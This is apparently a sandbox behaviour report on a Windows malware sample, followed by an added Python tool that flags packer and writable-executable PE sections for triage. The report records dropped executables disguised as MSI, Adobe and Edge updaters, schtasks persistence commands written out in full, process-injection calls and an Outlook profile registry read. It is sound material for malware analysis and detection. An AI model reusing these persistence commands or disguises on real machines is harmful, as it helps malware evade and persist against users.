Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe"
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe"
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dxcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: wldp.dll
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Section loaded: apphelp.dll
Source: EdgeMS2.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 3764472 > 1048576
Source: file.exe Static PE information: Raw size of .vmp is bigger than: 0x100000 < 0x370a00

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Unpacked PE file: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 9.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Unpacked PE file: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 22.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Unpacked PE file: 23.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 24.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 25.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Unpacked PE file: 27.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Unpacked PE file: 28.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Unpacked PE file: 29.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAB380 WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00BAB380
Source: initial sample Static PE information: section where entry point is pointing to: .vmp
Source: file.exe Static PE information: section name: .vmp
Source: file.exe Static PE information: section name: .vmp
Source: file.exe Static PE information: section name: .vmp
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: zy4GXi5yvCrsiS0ulH8Z.exe.0.dr Static PE information: section name: .MPRESS1
Source: zy4GXi5yvCrsiS0ulH8Z.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr Static PE information: section name: .MPRESS2
Source: hcMSmyGUCSEFc2FAKlzc.exe.0.dr Static PE information: section name: .MPRESS1
Source: hcMSmyGUCSEFc2FAKlzc.exe.0.dr Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr Static PE information: section name: .MPRESS2
Source: oobeldr.exe.7.dr Static PE information: section name: .MPRESS1
Source: oobeldr.exe.7.dr Static PE information: section name: .MPRESS2
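The unpacked-PE lines above record the MPRESS sections changing from ER on disk to EW at run time, and the static lines record the VMProtect (.vmp) and MPRESS section names, the entry point inside .vmp, and the oversized .text and .vmp sections. The following is an added example, not part of the Joe Sandbox report and not code from the sample: a stand-alone PE32 section-table parser that reproduces those static checks. The two headers it runs on are constructed here to mirror the report's layouts (the on-disk rights of .rsrc and .vmp are chosen by the author, the report does not give them), and the packer-name table is the author's own.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
BIG = 0x100000  # 1 MiB, the size threshold the report applies to .text and .vmp

# Section names seen in the report and the packers that create them (VMProtect, MPRESS).
# UPX is added as a further well-known example.
PACKER_SECTIONS = {".vmp": "VMProtect", ".MPRESS1": "MPRESS", ".MPRESS2": "MPRESS",
                   "UPX0": "UPX", "UPX1": "UPX"}


def rights(chars: int) -> str:
    """Render the IMAGE_SCN_MEM_* bits the way the report does: E, R, W."""
    bits = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    return "".join(letter for letter, bit in bits if chars & bit)


def parse_sections(pe: bytes):
    """DOS header -> PE signature -> COFF header -> optional header -> section table (PE32)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, off + 8)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name, "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    return entry_rva, sections


def triage(pe: bytes):
    """Static checks mirroring the report's Data Obfuscation findings."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    for s in sections:
        r = rights(s["chars"])
        name = s["name"]
        if name in PACKER_SECTIONS:
            findings.append(f"packer section {name} ({PACKER_SECTIONS[name]})")
        if "E" in r and "W" in r:
            findings.append(f"section {name} is writable and executable ({r})")
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], 1):
            tag = "" if name == ".text" else " (not .text)"
            findings.append(f"entry point {entry_rva:#x} in {name}{tag}")
        if s["rawsize"] == 0 and s["vsize"] >= BIG:
            findings.append(f"section {name} has no raw data but {s['vsize']:#x} virtual bytes (unpack target)")
        if s["vsize"] > BIG:
            findings.append(f"virtual size of {name} is bigger than {BIG:#x}: {s['vsize']:#x}")
        if s["rawsize"] > BIG:
            findings.append(f"raw size of {name} is bigger than {BIG:#x}: {s['rawsize']:#x}")
    return findings


def build_pe(sections, entry_rva: int) -> bytes:
    """Constructed PE32 header (no code) so the parser can be exercised offline."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    table = b""
    for name, vsize, vaddr, rawsize, chars in sections:
        table += name.encode().ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, vaddr, rawsize, 0, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Constructed layouts modelled on the report: an MPRESS-packed dropper (entry in .MPRESS2,
# code sections ER on disk) and the VMProtect-packed file.exe (.text > 1 MiB, .vmp raw size 0x370a00).
ER, RW = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
SAMPLE_MPRESS = build_pe([(".MPRESS1", 0x30000, 0x1000, 0x12000, ER),
                          (".MPRESS2", 0x1000, 0x31000, 0x800, ER),
                          (".rsrc", 0x2000, 0x32000, 0x2000, RW)], entry_rva=0x31100)
SAMPLE_VMP = build_pe([(".text", 0x120000, 0x1000, 0x1000, ER),
                       (".vmp", 0x371000, 0x121000, 0x370A00, ER)], entry_rva=0x121000)

if __name__ == "__main__":
    for label, pe in (("mpress", SAMPLE_MPRESS), ("vmp", SAMPLE_VMP)):
        print(label, *triage(pe), sep="\n  ")
```

To reproduce the ER-versus-EW observation in the unpacked-PE lines, run triage() on the dropped file and on a memory dump whose headers are intact (the report's dumps are taken at image base 0x400000) and diff the rights strings: the MPRESS stub makes its own sections writable before decompressing code into them.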
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DE42B3 push 21A73256h; iretd 0_2_00DE4329
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C96261 push cx; ret 0_2_00C96271
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFE7E9 push ecx; ret 0_2_00AFE7FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00C72B21 push ecx; ret 0_2_00C72B34
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D56C98 push eax; iretd 0_2_00D56CE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D78D67 push ds; retf 0_2_00D78D89
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DA0ED1 push es; retf 0_2_00DA0F93
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CEB30A push edi; ret 0_2_00CEB317
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CF55AC push cs; retf 0_2_00CF5577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CEDCCE push ebp; ret 0_2_00CEDCDC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CEDC78 push ebp; ret 0_2_00CEDCDC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0DEC3 push ebp; ret 0_2_00B0DF05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0716C245 push esi; ret 0_2_0716C24E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07145B83 push ecx; ret 0_2_07145B96
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Code function: 7_2_006D50A5 push ebp; ret 7_2_00721C57
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
